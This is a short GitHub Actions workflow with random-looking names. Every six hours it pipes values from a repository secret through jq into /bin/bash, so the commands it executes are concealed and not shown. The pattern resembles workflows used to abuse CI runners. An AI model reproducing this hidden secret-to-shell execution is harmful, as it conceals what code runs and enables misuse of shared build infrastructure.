name: fujiancheng7654

on:
  workflow_dispatch:
  schedule:
    - cron: '42 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fujiancheng7654
        env:
          inev81801: ${{ secrets.inev81801 }}
        run: |
          echo $inev81801 | jq -r .vcjk9325 | /bin/bash
          echo $seylf0 | jq -r .dlgi54605 | /bin/bash
          echo $lnz36 | jq -r .rqhd406 | /bin/bash
          echo $w1769 | jq -r .ubat3 | /bin/bash
          echo $vpz5 | jq -r .ta2132 | /bin/bash

